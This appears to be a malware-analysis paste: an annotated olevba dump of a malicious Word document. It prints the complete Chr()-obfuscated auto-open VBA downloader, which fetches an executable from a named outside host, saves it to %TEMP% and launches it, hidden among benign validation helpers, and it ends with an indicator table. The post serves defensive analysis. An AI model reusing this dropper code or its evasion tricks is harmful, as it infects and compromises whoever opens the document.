dynamoo

Malicious Word macro

Jul 23rd, 2015
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MASIHB-V orderf~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: orderf~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
' Auto-executing entry point: Word runs this as soon as the document is
' opened (olevba lists AutoOpen under AutoExec in the summary table below).
' The numeric argument is decorative - VEeve never reads it - and the only
' effect is to hand control to the downloader routine TgU9h0l0q in Module1.
Sub autoopen()

VEeve (8.2)

End Sub
  21.  
' Indirection hop between the AutoOpen trigger and the payload:
' autoopen -> VEeve -> TgU9h0l0q (Module1). FFFFF is never referenced.
' NOTE(review): presumably added so the auto-exec stub itself contains
' nothing that looks suspicious to a static scanner.
Sub VEeve(FFFFF As Long)
TgU9h0l0q

End Sub
  26.  
  27.  
  28.  
  29.  
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Module1.bas
  32. in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
' String constants carried over from the benign "stock symbol" helper code
' that pads this module; used only by QuotedSymbol, ValidStockSymbol and
' NumericFilter further down.
Public Const QUOTE = "'"
Public Const QUOTE2 = "''"
Public Const DOUBLE_QUOTE = """"
' Module-global drop path. TgU9h0l0q sets it to %TEMP%\ihhadnic.exe,
' H8a5KfhNJe writes the downloaded bytes there, and ValidateString2 reads it
' back to launch the file - the one piece of state shared by all three stages.
Public rGlT7xRnM As String
Public Const NUMERIC_KEYS = "-01234567890."
  40.  
  41.  
  42.  
  43. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  44. '
  45. Public Function Max(ByVal a As Variant, ByVal b As Variant) As Variant
  46.     If a > b Then
  47.         Max = a
  48.     Else
  49.         Max = b
  50.     End If
  51. End Function
  52.  
  53. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  54. '
  55. Public Function Min(ByVal a As Variant, ByVal b As Variant) As Variant
  56.     If a < b Then
  57.         Min = a
  58.     Else
  59.         Min = b
  60.     End If
  61. End Function
  62.  
  63. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  64. '
  65. Public Function Between(ByVal a As Variant, ByVal b As Variant, ByVal c As Variant) As Variant
  66.     If a < b Then
  67.         Between = b
  68.     ElseIf a > c Then
  69.         Between = c
  70.     Else
  71.         Between = a
  72.     End If
  73. End Function
  74.  
  75. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  76. '
  77. Public Function DBRead(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
  78.     On Error Resume Next
  79.     DBRead = IIf(IsNull(V), NullValue, V)
  80. End Function
  81.  
  82. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  83.  
' Downloader stage, reached from ThisDocument.autoopen via VEeve.
' Every string is built from Chr() calls with the filler characters "<",
' "=" and ";" mixed in; the Replace calls below (and inside ValidateString3)
' strip them before use. Decoded, the routine:
'   1. creates Microsoft.XMLHTTP and issues a synchronous GET to the URL,
'   2. resolves %TEMP% via WScript.Shell.Environment("Process"),
'   3. writes responseBody to %TEMP%\ihhadnic.exe through H8a5KfhNJe,
'   4. forces a divide-by-zero so the error handler calls ValidateString2,
'      which launches the file with Shell.Application.Open.
' For defenders: the decoded URL, the drop path and the Word-process ->
' network -> %TEMP% write -> child process sequence are all observable
' on an endpoint and are the useful indicators from this sample.
Sub TgU9h0l0q()

' Decodes (after the three Replace calls below) to
' "http://solution-acouphene.fr/mini/mppy.exe" - the olevba IOC "mppy.exe".
nByNDCCqAzBkEo = Chr(104) & Chr(116) & "<" & Chr(116) & Chr(112) & Chr(58) & Chr(47) & ";" & Chr(47) & "s" & Chr(111) & Chr(108) & Chr(117) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(45) & Chr(97) & Chr(99) & Chr(111) & Chr(117) & Chr(112) & Chr(104) & Chr(101) & Chr(110) & Chr(101) & Chr(46) & Chr(102) & Chr(114) & Chr(47) & Chr(109) & Chr(105) & Chr(110) & Chr(105) & Chr(47) & Chr(109) & Chr(112) & Chr(112) & Chr(121) & Chr(46) & "e" & Chr(120) & Chr(101)
' ProgID decodes to "Microsoft.XMLHTTP" - the HTTP client object.
Set rUuJO37ZN3t = ValidateString3(Chr(77) & Chr(105) & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(59) & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & Chr(59) & Chr(72) & Chr(84) & Chr(61) & Chr(84) & Chr(80))

' Strip the "<", "=" and ";" filler from the URL.
nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(60), "")
nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(61), "")
nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(59), "")
' CallByName hides the method name from keyword scans:
' .Open "GET", url, False (synchronous request).
CallByName rUuJO37ZN3t, "" + Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
nByNDCCqAzBkEo _
, False

' ProgID decodes to "WScript.Shell".
Set NQwAQCRSizomP = ValidateString3(Chr(87) & Chr(60) & "S" & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & "t" & Chr(59) & Chr(46) & Chr(83) & "=" & Chr(104) & "e" & "<" & Chr(108) & Chr(108))

' .Environment("Process") - the process environment block.
Set HU2f4J2c = CallByName(NQwAQCRSizomP, "E" & Chr(110) & Chr(118) & "i" & "r" & "o" & "n" & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))

' Reads the "TEMP" variable, i.e. the user's %TEMP% directory.
Z5pabTtIweA = HU2f4J2c("" + "T" & Chr(69) & Chr(77) & "P")

' Drop path = %TEMP%\ihhadnic.exe, kept in the module global so the
' error-handler launch stage (ValidateString2) can find it.
rGlT7xRnM = Z5pabTtIweA & "" + "\" & "i" & Chr(104) & Chr(104) & Chr(97) & Chr(100) & "n" & Chr(105) & Chr(99) & Chr(46) & "e" & Chr(120) & "e"
Dim eCWgqNwtczezs() As Byte

' .Send the request, then read .responseBody (the downloaded bytes).
CallByName rUuJO37ZN3t, "" + Chr(83) & Chr(101) & Chr(110) & "d", VbMethod
eCWgqNwtczezs = CallByName(rUuJO37ZN3t, "" + Chr(114) & "e" & Chr(115) & "p" & Chr(111) & Chr(110) & "s" & Chr(101) & "B" & "o" & "d" & Chr(121), VbGet)
' Write the bytes to the drop path (ADODB.Stream, see H8a5KfhNJe).
H8a5KfhNJe eCWgqNwtczezs, rGlT7xRnM
' Deliberate runtime error: 345 / 0 raises "Division by zero", so control
' jumps to kkiLwb6xLU and the launch happens inside the error handler,
' where a linear read of the routine would not expect it.
On Error GoTo kkiLwb6xLU
    a = 345 / 0
  On Error GoTo 0

sMkc0xymfSCd:
  Exit Sub
kkiLwb6xLU:
  ' Launch stage; the string argument is never read by ValidateString2.
  ValidateString2 ("qaMNp4efRqbw")
Resume sMkc0xymfSCd
End Sub
  118.  
  119. '
' Inverse of DBRead: maps the NullValue sentinel back to a database Null,
' anything else is returned as-is. Part of the benign padding code and not
' referenced by any routine in this dump.
' NOTE(review): if V and NullValue cannot be compared (e.g. a non-numeric
' String against the default 0) the comparison raises, On Error Resume Next
' skips the whole assignment and the function returns Empty.
Public Function DBWrite(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
    On Error Resume Next
    DBWrite = IIf(V = NullValue, Null, V)
End Function
  124.  
  125. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  126. ' Converts Symbol to form acceptable by Sql syntax
  127. ' AGR'A -> 'AGR''A'
  128. '
  129. Public Function QuotedSymbol(ByVal Symbol As String) As String
  130.     QuotedSymbol = QUOTE & Replace(Symbol, QUOTE, QUOTE2) & QUOTE
  131. End Function
  132.  
  133. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
' File-write stage. (The "Converts Symbol to standard form" comment that
' originally sat here belonged to the padding code, not to this routine.)
' PfWaLAWoFq4: the downloaded bytes (responseBody from TgU9h0l0q).
' rOvqV3q0jE:  destination path (%TEMP%\ihhadnic.exe via rGlT7xRnM).
' The ProgID decodes to "ADODB.Stream"; Type = 1 is adTypeBinary and the
' second SaveToFile argument 2 is adSaveCreateOverWrite, so an existing
' file at the path is silently replaced. Nothing is assigned to the
' function's return value.

Public Function H8a5KfhNJe(PfWaLAWoFq4 As Variant, rOvqV3q0jE As String)
Dim BxOUxRpIDhd: Set BxOUxRpIDhd = ValidateString3("A" & "<" & "d" & Chr(111) & Chr(59) & "d" & Chr(98) & Chr(61) & Chr(46) & Chr(83) & "t" & "=" & Chr(114) & "<" & "e" & Chr(97) & Chr(59) & "m")


   BxOUxRpIDhd.Type = 1
    BxOUxRpIDhd.Open
    BxOUxRpIDhd.write PfWaLAWoFq4
    BxOUxRpIDhd.savetofile rOvqV3q0jE, 2
End Function
  146.  
  147.  
  148.  
  149. ' AGR"A -> AGR'A
  150. '
  151. Public Sub ValidStockSymbol(Symbol As String)
  152.     Symbol = Replace(Symbol, QUOTE2, QUOTE)
  153.     Symbol = Replace(Symbol, DOUBLE_QUOTE, QUOTE)
  154. End Sub
  155.  
  156. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  157. '
  158. Public Sub NumericFilter(KeyAscii As Integer)
  159.     If KeyAscii > 31 Then
  160.         If InStr(NUMERIC_KEYS, Chr$(KeyAscii)) = 0 Then
  161.             KeyAscii = 0
  162.         End If
  163.     End If
  164. End Sub
  165.  
  166. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  167. ' CURRENCY 8 bytes
  168. ' A scaled integer between
  169. '   – 922,337,203,685,477.5808
  170. ' and 922,337,203,685,477.5807
  171. '
  172. ' We restrict it to be
  173. ' - positive
  174. ' - integer i.e. no fractions
  175. ' - not more than 14 symbols
  176. ' so it can be from 1 to 99 999 999 999 999
  177. '
' Padding lifted from a form-validation module; not referenced by any
' routine in this dump. NOTE(review): ss, d and de are declared nowhere
' here (presumably form objects in the original source), so with
' On Error Resume Next the control access simply fails and is skipped;
' the CCur step then falls into Fail and the function returns 0.
Public Function ValidateCurrency(TC As String)
Dim S As String
Dim i As Long
    On Error Resume Next
    '////////////////////////
   ' Restrict user input '/
   '//////////////////////
   With ss.TC
        i = .SelStart
        S = ValidateString(.Text, False, False, False, 14, 0)
        .Text = S
        .SelStart = i
    End With
    '///////////////////////
   ' Convert user input '/
   '/////////////////////
   On Error GoTo Fail
    ValidateCurrency = CCur(d.TC.Text)
    Exit Function
Fail:
    ' Any conversion error clears the field and reports 0.
    On Error Resume Next
    de.TC.Text = ""
    ValidateCurrency = 0
End Function
  202.  
  203. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  204. '
  205.  
' Object factory used by every stage: strips the filler characters "<",
' "=" and ";" from an obfuscated ProgID and calls CreateObject on it.
' Callers in this dump decode to Microsoft.XMLHTTP, WScript.Shell,
' ADODB.Stream and Shell.Application. Returns the created COM object.
' The parameter is ByRef by default and is rewritten in place, but every
' caller passes an expression, so nothing outside is affected.
Public Function ValidateString3(t5Ls3vWT9kn82Y As String)
t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(60), "")
t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(61), "")
t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(59), "")
 Set ValidateString3 = CreateObject("" + t5Ls3vWT9kn82Y)
End Function
' Padding (form-field price validator); not referenced by any routine in
' this dump. NOTE(review): dw is undeclared here, so under On Error Resume
' Next the With block's statements fail and the function returns 0.
Public Function ValidatePrice(TC As String) As Double
Dim S As String
Dim i As Long
    On Error Resume Next
    With dw.TC
        ' Validating UserInput
       i = .SelStart
        S = ValidateString(.Text, False, False, True, 10, 1000000000)
'        s = VBCleanEntry(.Text, ".", 2)
       .Text = S
        .SelStart = i
        ValidatePrice = Val(.Text)
    End With
End Function
  226.  
  227. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  228. '
' Padding (integer-amount validator, fractions disallowed); not referenced
' by any routine in this dump. NOTE(review): dw is undeclared here, so the
' With block fails under On Error Resume Next and 0 is returned.
Public Function ValidateAmount(TC As String) As Long
    Dim S As String
    Dim i As Long

    On Error Resume Next
    With dw.TC
        ' Validating UserInput
       i = .SelStart
        S = ValidateString(.Text, False, False, False, 10, 1000000000)
'        s = VBCleanEntry(.Text, ".", 2)
       .Text = S
        .SelStart = i
        ValidateAmount = Val(.Text)
    End With
End Function
  244.  
  245. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  246. '
' Padding (percentage validator: max 6 characters, max value 100, at most
' two decimals); not referenced by any routine in this dump.
' NOTE(review): dd is undeclared here, so the With block fails under
' On Error Resume Next and the function returns 0.
Public Function ValidatePercent(TC As String) As Double
Dim S As String
Dim i As Long
    On Error Resume Next
    With dd.TC
        i = .SelStart
        S = ValidateString(.Text, False, True, True, 6, 100)
        ' Trim the fractional part to two digits.
        Dim j As Long
        j = InStr(S, ".")
        If j > 0 Then
            Dim f As String
            Dim g As String
            f = Mid(S, j + 1)
            If Len(f) > 2 Then
                f = Left(f, 2)
            End If
            g = Left(S, j - 1)
            S = g & "." & f
        End If
        .Text = S
        .SelStart = i
        ValidatePercent = Val(.Text)
    End With
End Function
  271.  
  272. '   -------------------------------------------------------------
  273. '   function validates parsed string
  274. '   Use it on Change Event
  275.  
' Launch stage, invoked only from the error handler in TgU9h0l0q. The
' parameter is never read. The ProgID decodes to "Shell.Application";
' .Open on the path held in rGlT7xRnM (%TEMP%\ihhadnic.exe) starts the
' dropped file. NOTE(review): the new process would normally show up as
' a child of the Word process - confirm against sandbox telemetry.
Public Function ValidateString2(pq5Q05lvWOS32 As String)
 Set k69VPFQVKj0nQ = ValidateString3(Chr(83) & "h" & Chr(61) & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
With k69VPFQVKj0nQ
.Open (rGlT7xRnM)
End With
End Function
  282.  
  283. '   © 2000 Dmitry Grechishkin, grechishkin@egartech.com
  284.  
    ' Benign numeric-input sanitiser (the 2000 copyright notice above refers
    ' to it). Only the padding routines ValidateCurrency/Price/Amount/Percent
    ' call it; it plays no part in the download chain.
    ' Walks strInputString once and drops every character that is not a
    ' digit, an optional leading "-" (blnAllowNegative), or a single "."
    ' (blnAllowFractions; "," is first rewritten to "."). A leading "0" is
    ' dropped unless blnAllowZero. Returns the cleaned string, truncated to
    ' lngMaxLen characters and to lngMaxValue when those are > 0.
    ' NOTE(review): lngLenght is computed once and never refreshed after a
    ' character is cut away, so later Mid$/Right$ offsets refer to the
    ' original length; On Error Resume Next hides any resulting error.
    Public Function ValidateString( _
                            strInputString As String, _
                            blnAllowNegative As Boolean, _
                            blnAllowZero As Boolean, _
                            blnAllowFractions As Boolean, _
                            Optional lngMaxLen As Long = 0, _
                            Optional lngMaxValue As Long = 0 _
                            ) As String

    Dim strTmpValue  As String
    Dim strCurrentSymbol  As String
    Dim strLeftStroke As String
    Dim strRightStroke As String
    Dim lngLenght As Long
    Dim lngDotPosition As Long
    Dim blnInvalidSymbol As Boolean
    Dim blnCorrectDot  As Boolean

    Dim i As Long
    Dim j As Long

    On Error Resume Next

    strTmpValue = Trim$(strInputString)
    lngLenght = Len(strTmpValue)

    If lngLenght > 0 Then
'   ---------------------
'       Validates user input independently of locale and accepts ',' or '.' as decimal separator
       For i = 1 To lngLenght
        blnInvalidSymbol = True
'
       If blnAllowFractions And (Mid$(strTmpValue, i, 1) = ",") Then
            Mid$(strTmpValue, i, 1) = "."
        End If

        strCurrentSymbol = Mid$(strTmpValue, i, 1)
'            Truncates the value if it exceeds the maximum value
            If lngMaxValue > 0 Then
                If Abs(Val(strTmpValue)) > lngMaxValue Then
                    strTmpValue = Left$(strTmpValue, lngLenght - 1)
                    blnInvalidSymbol = True
                    GoTo EX
                End If
             End If
             If lngMaxLen > 0 Then
'            The sign does not count towards the length limit
               If Len(Trim$(Replace(strTmpValue, "-", " "))) > lngMaxLen Then
                    strTmpValue = Left$(strTmpValue, lngMaxLen)
                    blnInvalidSymbol = True
                    GoTo EX
                End If
             End If


            If i = 1 Then
                If blnAllowNegative And (strCurrentSymbol = "-") Then
                    blnInvalidSymbol = False
                    GoTo Check
                End If
'               A leading zero is rejected unless zero values are allowed
               If Not blnAllowZero And (strCurrentSymbol = "0") Then
                    blnInvalidSymbol = True
                    GoTo Check
                End If
            End If

'               --------------------------
'               numeric validation
               For j = 0 To 9
                    If strCurrentSymbol = Trim$(Str$(j)) Then
                        blnInvalidSymbol = False
                        GoTo Check
                    End If
                Next
'               --------------------------
'            only one decimal separator is allowed in the string
            If (lngDotPosition > 0) Then
                If (lngDotPosition = i) Then
                    blnCorrectDot = True
                Else
                    blnCorrectDot = False
                End If
             Else
                    blnCorrectDot = True
             End If

             If blnAllowFractions And (strCurrentSymbol = ".") And blnCorrectDot Then
                blnInvalidSymbol = False
                lngDotPosition = i
                GoTo Check
             End If

Check:
'   If an invalid symbol was found, cut it away
   If blnInvalidSymbol Then
        strLeftStroke = Left$(strTmpValue, i - 1)
        strRightStroke = Right$(strTmpValue, lngLenght - i)
        strTmpValue = strLeftStroke + strRightStroke
    End If
        Next
'   ---------------------
EX:
     ValidateString = strTmpValue

    End If
    On Error GoTo 0
End Function
  393. +------------+----------------------+-----------------------------------------+
  394. | Type       | Keyword              | Description                             |
  395. +------------+----------------------+-----------------------------------------+
  396. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  397. | Suspicious | Open                 | May open a file                         |
  398. | Suspicious | CreateObject         | May create an OLE object                |
  399. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  400. |            |                      | function calls                          |
  401. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  402. |            |                      | strings                                 |
  403. | Suspicious | SaveToFile           | May create a text file                  |
  404. | Suspicious | Write                | May write to a file (if combined with   |
  405. |            |                      | Open)                                   |
  406. | Suspicious | Open                 | May open a file (obfuscation: VBA       |
  407. |            |                      | expression)                             |
  408. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  409. |            |                      | be used to obfuscate strings (option    |
  410. |            |                      | --decode to see all)                    |
  411. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  412. |            |                      | may be used to obfuscate strings        |
  413. |            |                      | (option --decode to see all)            |
  414. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  415. |            | Strings              | may be used to obfuscate strings        |
  416. |            |                      | (option --decode to see all)            |
  417. | IOC        | mppy.exe             | Executable file name (obfuscation: VBA  |
  418. |            |                      | expression)                             |
  419. | IOC        | ihhadnic.exe         | Executable file name (obfuscation: VBA  |
  420. |            |                      | expression)                             |
  421. +------------+----------------------+-----------------------------------------+